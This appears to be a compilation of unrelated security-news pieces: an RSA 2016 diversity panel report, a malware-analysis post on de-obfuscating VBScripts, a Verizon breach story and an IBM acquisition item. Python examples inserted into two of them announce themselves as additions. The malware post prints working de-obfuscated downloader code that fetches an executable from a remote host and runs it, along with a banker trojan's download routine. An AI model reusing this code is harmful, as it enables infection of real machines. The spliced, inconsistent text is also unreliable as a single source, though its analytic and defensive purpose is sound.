To Improve Workforce Diversity, Widen The Search, Feed Infosec Talent Pipeline

RSA Conference 2016: Session panelists offered practical tips on how to attract more women and minorities, and challenged attendees to do some soul-searching.

SAN FRANCISCO, RSA Conference, Monday Feb. 29 — Overlapping themes arose today in sessions about improving the cybersecurity workforce’s ethnic and gender diversity, at the RSA Conference.

Panelists for “Bridging the Great Minority Cyber Divide–Social and Cultural Dynamics” and “Should I Stay or Should I Go? How to Attract/Retain Women in the Industry” gave some similar advice to attendees on how to improve diversity within their own infosec teams and within the industry at large.


From a practical standpoint, panelists spoke of the importance of widening the pool of qualified job applicants and supporting a more robust pipeline of young talent — from elementary school, straight through college, without losing them. They also spoke more deeply, about looking inward to recognize one’s own biases and the uncomfortable role of being “the only one in the room” (as in the only minority person, or the only woman).

“That feeling of being the only one in the room is very real,” said Yonesy Núñez, moderator of the Bridging the Minority Cyber Divide session and membership programs co-chair of the International Consortium of Minority Cybersecurity Professionals.

Núñez asked the panelists whether corporate “inclusion” efforts were effective. Panelist Devon Bryan, vice president and Global CISO of ADP LLC, said that the business case for diversity has definitely been made, and focused on the importance — now — of improving the diversity of the talent pipeline. Yet panelist Cecily Joseph, vice president of corporate responsibility and chief diversity officer for Symantec, said, “In a lot of cases, the business case [for workforce diversity] really hasn’t been made … I would shudder to think where we’d be if those [inclusion] programs didn’t exist.”

One of the troubles Joseph and other panelists said, throughout the day, that they face is that the argument used against diversity initiatives is “but we want the best candidates.”

“Yes, we all want the best candidates,” says Joseph, “but broaden the pool.” She suggests actively recruiting women and people of color, by going to them instead of waiting for them to find you through the same old channels.

Panelist Kevin McKenzie, CISO of Clemson University, also suggested a general rule for meeting more qualified applicants: move items out of “required skills” and into “preferred skills” on the job description, so candidates wouldn’t be so quickly rejected by the HR vetting process.

Kerry Matre, a member of the women in security panel, and Hewlett Packard Enterprise’s security services team, suggested using some resources from the National Center for Women and Information Technology, like their tips for conducting inclusive searches for job candidates and their “Male Allies and Advocates Toolkit.”  

“Be an advocate,” Matre suggests. “If you see someone say something inappropriate, immediately say [so],” instead of waiting to comment about it later.

Matre said that although she has never left a job because of a gender or diversity issue, there are times she has come home from an industry conference feeling ready to leave cybersecurity because of interactions that happened there. With that in mind, she challenged the audience to practice being an advocate right away. “I guarantee you, you will hear something inappropriate between now and the time you go to sleep tonight.”

Panelist Ping Look, director of security for Optiv, also referenced the inappropriate behavior of men towards her at industry events, particularly early in her career. Other women asked her why she stayed in the cybersecurity industry, enduring that behavior. “I kind of wanted to stay because I was the only woman.” Someone has to be first, she said, and if she stayed, she knew other women would come.

When asked how to retain the women on your team, Gurdeep Kaur, chief security architect at AIG and a panelist on the “Should I Stay or Should I Go” panel, recommended, “Don’t treat me differently” for being a woman, but as an individual. She also suggests to men having trouble engaging their female coworkers: “Don’t rule her out. It might not be that she doesn’t have things to say, but she doesn’t know how to break into that boy’s club.”

Panel moderator and ISC2 director of business development Elise Yacobellis recommended to the women in the audience, “Be your authentic self,” and not just try to fit into the “boy’s club.”

Matre said that people need to talk more about diversity within their organizations every day, so it becomes a normal conversation, instead of an awkward workshop from time to time. Joseph said diversity needs to be part of the entire business; not just during hiring, but during procurement, philanthropy, and more.

Angela Messer, executive vice-president at Booz Allen Hamilton and a panelist on the “Should I Stay Or Should I Go” panel, said, “We all have our own biases. Take a step back and ask ‘Am I giving people opportunities to grow’ … and if not, why not?”


Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior to that, she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad …


De-obfuscating malicious Vbscripts

Although they were never really gone, it looks like there is a rise in the number of malicious vbscripts in the wild. Maybe the similarity to VBA scripts and possible use in macros is responsible for the increased popularity. Let’s have a quick look at a few of them.

First some background

VBScript has been installed with every desktop version of Windows since Windows 98 and is based on the Visual Basic programming language. So, the advantages are that it is a reasonably straightforward language to use and the scripts will run on almost any Windows computer. The language being easy to interpret is also a bit of a problem for malware authors as researchers have no problems interpreting what they are up to. So some of them have tried some obfuscation methods to make it harder for researchers.

We will have a look at some examples. Starting with an easy one and working our way up.

Example 1

This one has the filename TEMPcoral.vbs and it piqued my interest as it was often found on systems that were heavily infected. Being one of the first to arrive on such systems, it looked as if it was the start of a series of infections that we call Yelloader, mostly Trojan.Droppers and Trojan.Clickers. You can find some examples in this removal guide. There are several versions of TEMPcoral.vbs, but one of them was indeed responsible for downloading and running a Trojan.Dropper that led to the rest of the infections.

This is a part of the obfuscated code:

dim all
all=Chr(83)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(119)+Chr(111)+Chr(115)+Chr(104)+Chr(105)+Chr(115)+Chr(104)+Chr(105)+Chr(32)+Chr(61)+Chr(32)+Chr(67)+Chr(114)+Chr(101)+Chr(97)+Chr(116)+Chr(101)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116)+Chr(40)+Chr(34)+Chr(77)+Chr(105)+Chr(99)+ etc.
Execute(all) 

The author simply replaced every character in the script with its character code. De-obfuscating straightforward scripts like this is as easy as changing “Execute” into “WScript.Echo”: the script then prints the decoded code instead of running it, and you can look at it.

dim all

all=Set shawoshishi = CreateObject("Micros"+"oft.XMLH""TTP"):Set yunxingqilaiba = CreateObject("Wsc""rip""t.Shell"):shawoshishi.Open "GET","http://xxx.xxx.xxx.xxx/~pchomee/dom/setup.exe",0:shawoshishi.setRequestHeader "If-Modified-Since",0:shawoshishi.Send():Set shishijiushishi = CreateObject("ADODB.Stream"):shishijiushishi.Mode = 3:shishijiushishi.Type = 1:shishijiushishi.Open():shishijiushishi.Write(shawoshishi.responseBody):dim conststr:conststr="abcdefghijklmnopqrstuvwxyz":dim i,rtime:rtime="":For i=0 To 4:Randomize:rtime=rtime&Mid(conststr,Int(Rnd()*Len(conststr))+1,1):Next:Set env=yunxingqilaiba.Environment("Process"):temppath=env.Item("TEMP"):path=temppath&"\"&rtime&".exe":shishijiushishi.SaveToFile path,2:path=path&" -install":wscript.sleep(1000):s="yunxing""qilaiba.R""un(path)":Execute(s)

Execute(all)

I x-rated the IP, but for those interested, this is the setup.exe that will be downloaded:

[image: the downloaded setup.exe]

The next example, called Bare Bones BTC $.vbs, was a bit more complicated, but de-obfuscating it was more or less just as simple. We detect it as Worm.Jenxcus.Script. This one overwrites all vbs files on a system with copies of itself and tries to steal bitcoin keys.

dim Bny_Slom

Bny_Slom = "42#63#94#35#117#104#102#114#103#104#117#35#61#35#107#114#120#103#108#113#108#35#43#102#44#35#118#110#124#115#104#35#61#35#107#114#120#103#108#113#108#48#105#123#35#96# etc.
.
.
.
.
Suleiman = ""
For Each Salem In Split(Bny_Slom, "#")
Suleiman = Suleiman & Chr(Salem - 3)
Next
dim i
i = 1
do until i = 10
Execute Suleiman
loop

The first de-obfuscated part of the script looks like this.

[image: first de-obfuscated part of the worm script]

I removed the Skype handle of the malware author and part of the host-name.
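For both of the simple schemes above, an analyst can recover the payload without ever letting the script run. The Python below is an added example, not code from this post: it rebuilds a Chr(n)+Chr(n)+... chain like the one in TEMPcoral.vbs, decodes a “#”-separated list with the worm’s Chr(value - 3) rule, and, for the Execute(variable) pattern, locates that variable’s assignment statically (the worm builds its variable in a loop rather than a single assignment, so for that one the data string is handed to the decoder directly). Function and variable names are the example’s own; the short Chr() chain is copied from the first example on the page and the delimited sample is constructed.

```python
import re
from typing import Optional

# Chr(n) calls, as used in the TEMPcoral.vbs concatenation chain.
CHR_CALL = re.compile(r"chr\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
# "name = value" statements and "Execute name" / "Execute(name)" statements.
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.MULTILINE)
EXECUTE = re.compile(r"^\s*Execute\s*\(?\s*(\w+)\s*\)?\s*$", re.MULTILINE | re.IGNORECASE)


def decode_chr_chain(expr: str) -> str:
    """Rebuild the string from a Chr(n)+Chr(n)+... expression without running it."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))


def decode_delimited(blob: str, sep: str = "#", offset: int = 3) -> str:
    """Rebuild the string from a sep-separated list of numbers where each
    character was stored as Asc(c) + offset; the worm's loop undoes this
    with Chr(Salem - 3), so offset defaults to 3."""
    return "".join(chr(int(tok) - offset) for tok in blob.split(sep) if tok.strip())


def recover_executed_payload(script: str) -> Optional[str]:
    """Static equivalent of swapping Execute for WScript.Echo: find the variable
    handed to Execute and decode its Chr() chain assignment. Returns None when
    there is no Execute, or the variable is not assigned a plain Chr() chain."""
    m = EXECUTE.search(script)
    if not m:
        return None
    target = m.group(1)
    for name, value in ASSIGN.findall(script):
        if name == target and CHR_CALL.search(value):
            return decode_chr_chain(value)
    return None


# Constructed sample: the opening of the page's first example, cut after Chr(99).
SAMPLE_SCRIPT = (
    "dim all\n"
    "all=Chr(83)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(119)"
    "+Chr(111)+Chr(115)+Chr(104)+Chr(105)+Chr(115)+Chr(104)+Chr(105)+Chr(32)"
    "+Chr(61)+Chr(32)+Chr(67)+Chr(114)+Chr(101)+Chr(97)+Chr(116)+Chr(101)"
    "+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116)+Chr(40)+Chr(34)"
    "+Chr(77)+Chr(105)+Chr(99)\n"
    "Execute(all)\n"
)
# Constructed sample for the delimited scheme: "msgbox 1" with every code shifted by +3.
SAMPLE_DELIMITED = "112#118#106#101#114#123#35#52"

if __name__ == "__main__":
    print(recover_executed_payload(SAMPLE_SCRIPT))
    print(decode_delimited(SAMPLE_DELIMITED))
```

The point of doing this statically is that nothing from the sample is ever interpreted; the Execute-to-Echo trick still runs the outer script, which is fine in a sandbox but not on an analyst workstation.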

 

And to show you that it’s not always that easy, we will have a look at some parts of a file called Curriculum_vitae_Suzana_p.vbs that turned out to be a Banker.Trojan Downloader.

This one uses a lot of functions. One of them was written to obfuscate a lot of other parts of the code.

Below is the obfuscated code in this function:

function RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu(cdguuaFZj)
Dim IVtfgpHgZVTWSQzHZNClG
Dim GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT
Dim PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm
Dim jNdOjYXVIVKyQAEpJhb
Dim MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE
Dim WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ
Dim nnzVOsFZXdNgBVgD
Dim dbjsiqCAm
IVtfgpHgZVTWSQzHZNClG           = Len(Cstr(22-21)) - (26-25)
GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT  = IVtfgpHgZVTWSQzHZNClG
PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm          = CLng("&h" & Mid(cdguuaFZj, (26-25), (10-8)))
jNdOjYXVIVKyQAEpJhb   = (10-8) + (12-11)
do
 MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE = CLng("&h" & Mid(cdguuaFZj, jNdOjYXVIVKyQAEpJhb, (10-8)))
 If (GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT < IVtfgpHgZVTWSQzHZNClG) Then
  GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT = GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT + (16-15)
 Else
  GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT = (16-15)
 End If
 WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ = MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE Xor Asc(Mid(Cstr((6-5)),GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT,(46-45)))
 if (WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ <= PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm) Then
  WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ = 25 + 25 + 25 + 25 + 25 + 25 + 25 + 25 + 25 + 25 + 5  + WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ - PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm
 Else
  WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ = WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ - PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm
 End If
 nnzVOsFZXdNgBVgD       = nnzVOsFZXdNgBVgD & chr(WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ)
 PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm          = MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE
 jNdOjYXVIVKyQAEpJhb   = jNdOjYXVIVKyQAEpJhb + (10-8)
loop until (jNdOjYXVIVKyQAEpJhb >= len(cdguuaFZj))
RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu = nnzVOsFZXdNgBVgD
end function

Giving the variables meaningful names and solving the calculations makes this function a lot friendlier to look at:

function FunctionDecrypt1(input)
Dim Integer1
Dim Integer2
Dim Long1
Dim Integer3
Dim Long2
Dim Long3
Dim String1
Integer1              = 0
Integer2              = Integer1
Long1    = CLng("&h" & Mid(input, (1), (2)))
Integer3              = 3
do
 Long2 = CLng("&h" & Mid(input, Integer3, 2))
 If (Integer2 < Integer1) Then
  Integer2 = Integer2 + 1
 Else
  Integer2 = 1
 End If
 Long3 = Long2 Xor Asc(Mid(Cstr((1)),Integer2,(1)))
 if (Long3 <= Long1) Then
  Long3 = 255  + Long3 - Long1
 Else
  Long3 = Long3 - Long1
 End If
 String1  = String1 & chr(Long3)
 Long1    = Long2
 Integer3              = Integer3 + (2)
loop until (Integer3 >= len(input))
FunctionDecrypt1 = String1
end function

As an example of how this function was used in other parts of the script we can have a look at the section where the script downloads a file and writes that to a location on the infected system.

This is the before:

function YMGdwSKMICYDqMeUVeZQJrylhKndIYzbUDNvOOqFRXcHVpiic(BOUhcBXabUipFqVjyrEHaeWQHnUsAerb,qjMdnLJlsdGPJnXw)
On Error Resume Next
Set mPnrPkNOJASpwppobITDRCBz = CreateObject(RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("DB185A83E11F60BF2947A2DB016485"))
mPnrPkNOJASpwppobITDRCBz.open RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("186E82E7"),  BOUhcBXabUipFqVjyrEHaeWQHnUsAerb, false
mPnrPkNOJASpwppobITDRCBz.send()
IpsflGFZyCjOdhdksrqaMWUaqll = (mPnrPkNOJASpwppobITDRCBz.Status = (((1 + 1 + 1) * (50 + 10)) + (10 + 10)))
If IpsflGFZyCjOdhdksrqaMWUaqll Then
Set okYHoYEauCTLLmt = CreateObject(RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("58A8DD1C51A2E104498ADE71EF"))
okYHoYEauCTLLmt.Open
okYHoYEauCTLLmt.Type = 1
okYHoYEauCTLLmt.Write mPnrPkNOJASpwppobITDRCBz.ResponseBody
okYHoYEauCTLLmt.Position = 0
Set RvcTWPRHvSwoOYfHLbVIFYJWGFyXCGVawFkM = Createobject(RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("B73AAC2EA626AB24A33A59AE29A43BBF084A8FC50260F36FE578DD"))
If RvcTWPRHvSwoOYfHLbVIFYJWGFyXCGVawFkM.Fileexists(qjMdnLJlsdGPJnXw) Then
RvcTWPRHvSwoOYfHLbVIFYJWGFyXCGVawFkM.DeleteFile  qjMdnLJlsdGPJnXw
End If
okYHoYEauCTLLmt.SaveToFile qjMdnLJlsdGPJnXw
okYHoYEauCTLLmt.Close
Set okYHoYEauCTLLmt = Nothing
End if
Set mPnrPkNOJASpwppobITDRCBz = Nothing
end function

After some renaming and using the function we figured out earlier, this is the after.

function DownloadToFile(url1,StringPathToFile)
On Error Resume Next
Set httpObject = CreateObject("MSXML2.XMLHTTP")
httpObject.open "GET",  url1, false
httpObject.send()
LongStatusBooleanBoolean = (httpObject.Status = (200))
If LongStatusBooleanBoolean Then
 Set objectStream = CreateObject("ADODB.Stream")
 objectStream.Open
 objectStream.Type = 1
 objectStream.Write httpObject.ResponseBody
 objectStream.Position = 0
 Set Object1 = Createobject("Scripting.FileSystemObject")
 If Object1.Fileexists(StringPathToFile) Then
  Object1.DeleteFile  StringPathToFile
 End If
 objectStream.SaveToFile StringPathToFile
 objectStream.Close
 Set objectStream = Nothing
End if
Set httpObject = Nothing
end function

Even though the malware author in this case was friendly enough to insert comments about the use of some functions (in Portuguese), this one took me a lot more time to de-obfuscate than the other two. Most of all because the use of functions makes the script a lot less straightforward. I had to find and figure out the “DecryptFunction” first before I could make any sense of the rest.
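To check the reading of FunctionDecrypt1 above and to automate the renaming step, here is a Python port. It is an added example, not part of the post: it applies the same per-byte XOR and previous-byte chaining, then substitutes every call to the obfuscator’s decrypt function in a VBScript excerpt with the recovered literal. Two details of the original are worth noticing and are kept as-is: Integer1 is 0, so Integer2 is forced to 1 on every pass and the “key” is just the character “1” (0x31); and the wrap-around adds 255, not 256, which is why the comparison is <=. The four ciphertexts it checks against are those in the page’s “before” function, with the plaintexts from the “after”; names such as decrypt1 and inline_decrypted_strings are the example’s own.

```python
import re

# Ciphertext/plaintext pairs taken from the page's "before" and "after" functions.
PAGE_SAMPLES = {
    "DB185A83E11F60BF2947A2DB016485": "MSXML2.XMLHTTP",
    "186E82E7": "GET",
    "58A8DD1C51A2E104498ADE71EF": "ADODB.Stream",
    "B73AAC2EA626AB24A33A59AE29A43BBF084A8FC50260F36FE578DD": "Scripting.FileSystemObject",
}


def decrypt1(hexstr: str) -> str:
    """Port of the post's FunctionDecrypt1.

    The first byte is only a seed (Long1). Every following byte (Long2) is
    XORed with Asc("1") and then un-chained against the previous ciphertext
    byte: values <= the previous byte get 255 added (Long3 = 255 + Long3 - Long1).
    """
    hexstr = hexstr.strip()
    if len(hexstr) < 4 or len(hexstr) % 2:
        raise ValueError("ciphertext must be an even number of hex digits, at least two bytes")
    key = ord("1")                          # Asc(Mid(CStr(1), 1, 1))
    prev = int(hexstr[0:2], 16)             # Long1 = CLng("&h" & Mid(input, 1, 2))
    out = []
    for pos in range(2, len(hexstr), 2):    # Integer3 = 3, 5, ... in 1-based VBScript
        cur = int(hexstr[pos:pos + 2], 16)  # Long2
        val = cur ^ key                     # Long3
        if val <= prev:
            val = 255 + val - prev
        else:
            val = val - prev
        out.append(chr(val))
        prev = cur                          # Long1 = Long2: chaining on ciphertext
    return "".join(out)


# The obfuscator's decrypt function name, as it appears in the page's "before" code.
CALL = re.compile(r'RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu\("([0-9A-Fa-f]+)"\)')


def inline_decrypted_strings(vbs_source: str) -> str:
    """Replace each call to the decrypt function with the recovered, quoted literal,
    which is the substitution the post performs by hand to get the "after" version."""
    return CALL.sub(lambda m: '"%s"' % decrypt1(m.group(1)), vbs_source)


# Constructed excerpt: two lines copied from the page's "before" function.
SAMPLE_VBS = (
    'Set mPnrPkNOJASpwppobITDRCBz = CreateObject('
    'RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("DB185A83E11F60BF2947A2DB016485"))\n'
    'mPnrPkNOJASpwppobITDRCBz.open '
    'RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("186E82E7"),  '
    'BOUhcBXabUipFqVjyrEHaeWQHnUsAerb, false\n'
)

if __name__ == "__main__":
    for ct, expected in PAGE_SAMPLES.items():
        pt = decrypt1(ct)
        print(f"{ct} -> {pt!r} ({'ok' if pt == expected else 'MISMATCH'})")
    print(inline_decrypted_strings(SAMPLE_VBS))
```

Because the scheme chains on the ciphertext byte rather than the plaintext, each hex string decrypts independently, so a regex pass over the whole script recovers every string in one go without tracking state between calls.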

Delivery

Vbscripts can arrive on your system in different ways, among them drive-by downloads (think malvertising). There are also many methods that infect Word and Excel documents. Due to the close relationship between VBA and VBScript, and the fact that the Office document types are usually allowed as attachments, contrary to executables, this method is likely to stay in use.

Recommendations

If you don’t need to run scripts, consider disabling Windows Script Host. Also, do not enable macros unless you are positively sure that you can trust the document and actually need macros to use it. If possible, contact the sender/creator and ask about the necessity.

Summary

With the renewed popularity of Visual Basic as a first attack vector in mind, we took a look at de-obfuscating a few recent vbs files, starting with a very easy one and progressing to a much more complex script.

Special thanks to my online friends that helped me find samples: Oh My!, tetonbob and blender.

Pieter Arntz


Pirates, Ships, And A Hacked CMS: Inside Verizon’s Breach Investigations

New Verizon Data Breach Digest report shares in-the-trenches scenarios of actual cyberattack investigations by the company’s RISK team.

SAN FRANCISCO, CALIF. – RSA Conference 2016 – Pirates used hacked information from a global shipping company’s servers to target and capture cargo ships on the high seas, and a water utility’s valves and ducts were hijacked: these are some of the more dramatic scenarios representing cases Verizon’s breach team investigated in the past year.

For several months, armed pirates had been strategically attacking ships at sea, armed also with bill of lading information pilfered via a Web-borne attack on the company’s content management system (CMS). The pirates would storm the ship, corral the crew, locate specific cargo containers by searching for specific bar codes, and steal the contents. Then they’d disembark and move on to their next target ship.

Verizon investigators discovered that the bad guys initially had uploaded a malicious Web shell to the shipping company’s CMS server, which manages shipping inventory and bills of lading for its ships.  “The threat actors used an insecure upload script to upload the web shell and then directly call it as this directory was web accessible and had execute permissions set on it—no Local File Inclusion (LFI) or Remote File Inclusion (RFI) required,” according to a new Verizon report to be published tomorrow.

“Essentially, this allowed the threat actors to interact with the webserver and perform actions such as uploading and downloading data, as well as running various commands. It allowed the threat actors to pull down bills of lading for future shipments and identify sought-after crates and the vessels scheduled to carry them.”
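The web shell in this case got in through an upload script that wrote the attacker’s file, under the attacker’s own file name, into a directory the web server both served and executed from. As an added example, not Verizon’s code or anything from the report, the Python below contrasts that pattern with a hardened upload handler: an extension allow-list, a check of the body for script markers, a server-chosen random file name, storage outside the web root, and no execute bit on the stored file. All paths, names and sample bodies are constructed for the example, and the demo runs in a throwaway temporary directory.

```python
import os
import secrets
import stat
import tempfile
from pathlib import Path

ALLOWED_EXT = {".pdf", ".png", ".jpg"}
SCRIPT_MARKERS = (b"<?php", b"<%", b"<script")


class UploadRejected(ValueError):
    pass


def save_upload_insecure(filename: str, data: bytes, web_root: Path) -> Path:
    """The 'before': the client's own file name is written straight into a
    directory the web server serves, so whatever was uploaded is reachable by URL."""
    dest = web_root / "uploads"
    dest.mkdir(parents=True, exist_ok=True)
    path = dest / filename
    path.write_bytes(data)
    return path


def is_under(path: Path, root: Path) -> bool:
    """True when path resolves to somewhere inside root."""
    try:
        path.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False


def validate_upload(filename: str, data: bytes) -> str:
    """Allow-list the extension, refuse script bodies, and choose the stored
    name server-side so the client controls neither name nor location."""
    ext = Path(filename).suffix.lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    head = data[:512].lower()
    if any(marker in head for marker in SCRIPT_MARKERS):
        raise UploadRejected("script content in upload body")
    return secrets.token_hex(16) + ext


def save_upload_hardened(filename: str, data: bytes, upload_dir: Path, web_root: Path) -> Path:
    """The 'after': store outside the web root, never overwrite, no execute bit."""
    if is_under(upload_dir, web_root):
        raise UploadRejected("upload directory must not be inside the web root")
    name = validate_upload(filename, data)
    upload_dir.mkdir(parents=True, exist_ok=True)
    path = upload_dir / name
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)  # rw-r-----
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo() -> dict:
    """Exercise both handlers on constructed inputs in a temporary tree."""
    base = Path(tempfile.mkdtemp())
    web_root, upload_dir = base / "htdocs", base / "uploads"
    smuggled = b"<?php /* constructed marker, not a script */ ?>"  # script-like body
    image = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32                   # PNG-like body
    results = {}
    p = save_upload_insecure("avatar.php", smuggled, web_root)
    results["insecure_lands_in_webroot"] = is_under(p, web_root)
    for key, args in (
        ("hardened_rejects_script_body", ("avatar.png", smuggled, upload_dir)),
        ("hardened_rejects_extension", ("avatar.php", image, upload_dir)),
        ("hardened_rejects_dir_in_webroot", ("avatar.png", image, web_root / "uploads")),
    ):
        try:
            save_upload_hardened(*args, web_root)
            results[key] = False
        except UploadRejected:
            results[key] = True
    stored = save_upload_hardened("avatar.png", image, upload_dir, web_root)
    results["stored_outside_webroot"] = not is_under(stored, web_root)
    results["stored_name_is_random"] = stored.name != "avatar.png" and stored.suffix == ".png"
    results["stored_without_exec_bit"] = not (stored.stat().st_mode & stat.S_IXUSR)
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The body check is a coarse signal, not a parser; the controls that actually remove the execute path are the location outside the web root and the file mode, which is why the handler refuses to run at all when the configured upload directory sits under the web root.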

That’s just one page-turner in Verizon’s new Data Breach Digest report. The investigations documented in the report are all drawn from real cases the team handled, but Verizon says it employed some “creative license” to protect the anonymity of its customers, using fictional names, locations, and, in some cases, breach sizes.

“The majority of them were in 2015 … But it’s not a sort of trending report,” says Marc Spitler, senior manager of Verizon security research. “It’s more of a popcorn piece to sit back and read and take a look at some things we have responded to, from the mindset and point of view of a forensics investigator.”

The pirate attack scenario is based on a real case, but of course this is not the usual pirate story associated with technology (think software piracy). The case demonstrates how hackers increasingly are going after CMSes, according to Spitler. “We are starting to see that [CMS attacks] more and more,” he says.

“The majority of cases we respond to are more along the lines of Web apps” attacks, he says. “I’m not saying you have to worry about pirates, but you do need to worry about CMS plug-ins in your apps being targeted quite a bit by the adversary.”

The report also describes a “water” utility that was experiencing mysterious and unexplained manipulation of its PLCs that controlled the water treatment process as well as the flow. Spitler says he wasn’t privy to that particular case, but it was indeed a critical infrastructure operation’s control system that was exploited.

“I’m happy to say we’re not responding to this” type of attack every day, he says.

In a nutshell, the attackers stole credentials on the utility’s payment app Web server to access the valve and control system application, all of which ran on older IBM AS400 computer systems. “During these connections, the threat actors modified application settings with little apparent knowledge of how the flow control system worked,” the report says. An alert system allowed the utility to spot the anomaly and correct the controls, according to the report.

As for Verizon’s wildly popular Data Breach Investigations Report (DBIR) due this spring that focuses on trends among actual data breaches the company has worked on, Spitler says it will be more of the same in many of the underlying issues. “You’re going to see strong relationships to the classification patterns featured in last year’s DBIR,” he says.

The DBD illustrates the prevalence of phishing as a first vector of attack, and credentials reuse as a weak link, for example, he says. “Tried and true things” still dominate, he says.

“Nobody wants to be the victim of a breach or to live through one of these war stories,” Spitler says. “We have to be very realistic and understanding that it’s certainly a possibility no matter what you do, how well-intended your security processes and procedures were.”

Some of the cases Verizon investigated were hampered by “blocks or potholes” in the victim organization’s processes or lack of incident response preparation that impaired a rapid and smooth investigation, he says.

“It’s important for an organization to understand how it can prepare for somebody internally or externally to do a forensics investigation,” he says. 


Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …


IBM To Buy Resilient Systems In Bid To Build Incident Response Capabilities

Company has also launched a new incident response service and entered into a partnership with Carbon Black.

IBM on Monday announced plans to acquire incident response provider Resilient Systems for an undisclosed sum and to launch a new incident response service, as part of a broader effort to boost its capabilities in the fast-growing incident response market.

IBM also announced a partnership with endpoint security provider Carbon Black under which IBM will use the latter’s incident protection and response technologies to deliver remote incident response services to enterprise customers.

The acquisition and partnership are part of an IBM effort to build services for responding to security incidents in a timely, organized and coordinated manner, Caleb Barlow, vice president of IBM Security, said in comments to Dark Reading. IBM customers are increasingly demanding such capabilities, he says.

Resilient Systems offers a response management platform that is designed to let security teams automate response processes and resolve security incidents more effectively. The company describes its technology as enabling organizations to develop dynamic action plans for nearly 20 different incident scenarios, from malware and denial of service attacks to lost devices.

Resilient’s platform is designed to walk enterprise security teams through the incident response process and supports comprehensive analytics, dashboards and reporting features. With headquarters in Cambridge, MA, Resilient employs around 100 people and claims numerous customers among Fortune 500 companies as well as small and mid-sized businesses in the financial services, healthcare, retail and government sectors.

Once the acquisition is finalized, Resilient’s Incident Response Platform will complement IBM’s existing QRadar security intelligence platform to create a comprehensive security operations and response capability, Barlow says. IBM’s new X-Force Incident Response Services will be based on Resilient Systems’ platform as well as IBM’s existing QRadar security incident and event management (SIEM) platform.

“It will also include remote incident response capabilities via our technology partnership with Carbon Black,” Barlow said. Carbon Black’s technology will enable IBM security analysts to conduct forensics on compromised endpoint devices, determine where a breach first occurred, map it across other devices, contain it quickly, and shut it down, Barlow says.

The Resilient purchase gives IBM a way to unite the technical and business aspects of incident response, said David Monahan, an analyst with Enterprise Management Associates, in an analyst note. With the acquisition, IBM will have a comprehensive set of capabilities ranging from incident detection and forensics to analysis, remediation, process management, resource coordination and communications, he said.

The dramatic rise in mega security breaches in recent times has heightened the need for organizations to have capabilities for quickly detecting and mitigating security incidents. Numerous recent studies and surveys have shown that one of the biggest challenges enterprises face these days is in knowing when they have had a security incident and then having a process for responding to and mitigating it.

“Organizations of all sizes can no longer afford to under-service or ignore incident response,” Monahan said. “IR must move beyond a loose semblance of scattered, incomplete, outdated, and untested documentation to an actual programmatic collection of documentation and tools.”

